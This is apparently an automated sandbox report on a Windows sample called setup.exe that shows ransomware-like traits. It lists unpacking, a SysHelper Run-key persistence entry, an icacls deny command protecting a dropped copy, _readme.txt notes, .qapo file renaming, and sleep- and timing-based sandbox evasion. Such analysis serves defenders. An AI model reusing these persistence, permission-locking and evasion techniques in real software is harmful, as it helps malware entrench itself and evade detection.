        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\,]:<U source: setup.exe, 00000007.00000003.2773335640.0000000003A34000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2774492589.0000000003A75000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2774727040.0000000003A76000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2768648555.0000000003A8A000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773962244.0000000003A3D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ome\m source: setup.exe, 00000007.00000003.2742372787.0000000003960000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2764452722.0000000003961000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\;.P"^ source: setup.exe, 00000007.00000003.2713731803.0000000003911000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2713597685.0000000003900000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2743570306.00000000038F1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: setup.exe, setup.exe, 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, setup.exe, 0000000B.00000002.2245401585.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 0000000C.00000002.2255626212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, setup.exe, 00000010.00000002.2324184436.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 00000011.00000002.2337074777.0000000000400000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: asers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.qapo source: setup.exe, 00000007.00000003.2627156422.0000000003167000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tory\/ source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tory\ source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\E@ source: setup.exe, 00000007.00000003.2742372787.0000000003960000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2764452722.0000000003961000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: setup.exe, 00000007.00000003.2785654234.00000000035C2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: setup.exe, 00000007.00000003.2785218646.0000000003A0C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tory\! source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: setup.exe, 00000007.00000003.2685562013.00000000036E1000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685409736.00000000036D0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\21\} source: setup.exe, 00000007.00000003.2411613102.0000000003167000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ta\P source: setup.exe, 00000007.00000003.2712522294.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2710234976.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2713919458.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723719415.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2722862475.00000000035A8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: setup.exe, 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, setup.exe, 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, setup.exe, 0000000B.00000002.2245401585.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 0000000C.00000002.2255626212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, setup.exe, 00000010.00000002.2324184436.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 00000011.00000002.2337074777.0000000000400000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tory\< source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: setup.exe, 00000007.00000003.2710455878.0000000003948000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724383296.0000000003969000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724018230.0000000003950000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723254796.0000000003949000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\fr-BE\od.pdb\ source: setup.exe, 00000007.00000003.2785158322.0000000003AEE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\C2\*B source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: setup.exe, 00000007.00000003.2782379959.0000000003A86000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\) source: setup.exe, 00000007.00000003.2711853010.00000000036E8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685562013.00000000036E1000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685409736.00000000036D0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\21\j? source: setup.exe, 00000007.00000003.2724257991.0000000003929000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\kSf6 source: setup.exe, 00000007.00000003.2764644897.00000000039FD000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2764499764.00000000039D5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\[l source: setup.exe, 00000007.00000003.2773335640.0000000003B02000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2779194875.0000000003AFF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2779024019.0000000003ABF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\3\J` source: setup.exe, 00000007.00000003.2626657794.0000000003180000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\"<~ \ source: setup.exe, 00000007.00000003.2724257991.0000000003929000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\t source: setup.exe, 00000007.00000003.2774727040.0000000003A44000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773335640.0000000003A34000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773962244.0000000003A3D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.qapo source: setup.exe, 00000007.00000003.2626071304.0000000003640000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625931731.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\3\ source: setup.exe, 00000007.00000003.2743351263.00000000036E5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\p\*\ source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\< source: setup.exe, 00000007.00000003.2684541457.000000000358E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684849989.0000000003640000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\o@ source: setup.exe, 00000007.00000003.2768965443.000000000398D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2768366694.000000000396F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2764452722.0000000003961000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\O2 source: setup.exe, 00000007.00000003.2768648555.0000000003AA6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773335640.0000000003A34000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2774492589.0000000003A75000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2774727040.0000000003A76000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773962244.0000000003A3D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\s\ source: setup.exe, 00000007.00000003.2686703862.0000000003182000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684970587.0000000003177000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2626657794.0000000003180000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: setup.exe, 00000007.00000003.2742372787.0000000003960000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2764452722.0000000003961000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: setup.exe, 00000007.00000003.2723110611.0000000003751000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724191836.000000000375B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tory\k source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\) source: setup.exe, 00000007.00000003.2785762338.0000000003665000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\\ source: setup.exe, 00000007.00000003.2785158322.0000000003AEE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\$ source: setup.exe, 00000007.00000003.2773242341.00000000039EC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2772716906.00000000039EC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tory\y source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.qapoS source: setup.exe, 00000007.00000003.2626071304.0000000003640000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625931731.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorCache\SettingsCache.txt.qapotxt source: setup.exe, 00000007.00000003.2626071304.0000000003640000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625931731.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C\ source: setup.exe, 00000007.00000003.2743511663.0000000003763000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723110611.0000000003751000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724191836.000000000375B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2742307025.0000000003749000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\T source: setup.exe, 00000007.00000003.2774886309.0000000003AE6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2779024019.0000000003ABF000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\setup.exeUnpacked PE file: 2.2.setup.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
        Source: C:\Users\user\Desktop\setup.exeUnpacked PE file: 7.2.setup.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeUnpacked PE file: 12.2.setup.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeUnpacked PE file: 17.2.setup.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
        Source: C:\Users\user\Desktop\setup.exeUnpacked PE file: 2.2.setup.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\setup.exeUnpacked PE file: 7.2.setup.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeUnpacked PE file: 12.2.setup.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeUnpacked PE file: 17.2.setup.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00405440 LoadLibraryA,GetProcAddress,VirtualProtect,0_2_00405440
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004051D0 push ecx; mov dword ptr [esp], 00000004h0_2_004051D1
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004051A0 push ecx; mov dword ptr [esp], 00000000h0_2_004051A1
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0040A3C0 push ecx; ret 0_2_0040A3D3
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0040D3F5 push ecx; ret 0_2_0040D408
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01F3F0AF push ecx; retf 0_2_01F3F0B2
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_02038F05 push ecx; ret 0_2_02038F18
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00428565 push ecx; ret 2_2_00428578
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_0064D0AF push ecx; retf 5_2_0064D0B2
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_02098F05 push ecx; ret 5_2_02098F18
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: 6_2_004051D0 push ecx; mov dword ptr [esp], 00000004h6_2_004051D1
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: 6_2_004051A0 push ecx; mov dword ptr [esp], 00000000h6_2_004051A1
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: 6_2_0040A3C0 push ecx; ret 6_2_0040A3D3
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: 6_2_0040D3F5 push ecx; ret 6_2_0040D408
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050D050 push eax; retn 004Dh7_2_0050D6B5
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050D008 push eax; retn 004Dh7_2_0050D6B5
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050D028 push eax; retn 004Dh7_2_0050D6B5
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050D090 push eax; retn 004Dh7_2_0050D6B5
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050D0A8 push eax; retn 004Dh7_2_0050D6B5
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050D318 push eax; retn 004Dh7_2_0050D6B5
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050C4E0 push eax; retn 004Dh7_2_0050D6B5
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050D550 push eax; retn 004Dh7_2_0050D6B5
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00428565 push ecx; ret 7_2_00428578
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050D698 push eax; retn 004Dh7_2_0050D6B5
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050C960 push eax; retn 004Dh7_2_0050D6B5
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050C928 push eax; retn 004Dh7_2_0050D6B5
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050C988 push eax; retn 004Dh7_2_0050D6B5
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050C9A8 push eax; retn 004Dh7_2_0050D6B5
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050CB78 push eax; retn 004Dh7_2_0050D6B5
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050CD60 push eax; retn 004Dh7_2_0050D6B5
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050CDF0 push eax; retn 004Dh7_2_0050D6B5
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0050CE58 push eax; retn 004Dh7_2_0050D6B5

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\Desktop\setup.exeSystem file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.htmlJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\Local Settings\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe.qapo (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeJump to dropped file
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\setup.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
        Source: C:\Users\user\Desktop\setup.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_00481920
        Source: C:\Users\user\Desktop\setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\setup.exeStalling execution: Execution stalls by calling Sleepgraph_7-44110
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01F3D71C rdtsc 0_2_01F3D71C
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,7_2_00481920
        Source: C:\Users\user\Desktop\setup.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,2_2_0040E670
        Source: C:\Users\user\Desktop\setup.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,7_2_0040E670
        Source: C:\Users\user\Desktop\setup.exeThread delayed: delay time: 700000Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\Local Settings\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe.qapo (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeJump to dropped file
        Source: C:\Users\user\Desktop\setup.exeEvaded block: after key decisiongraph_0-43243
        Source: C:\Users\user\Desktop\setup.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-45725
        Source: C:\Users\user\Desktop\setup.exe TID: 5588Thread sleep time: -700000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00410160
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
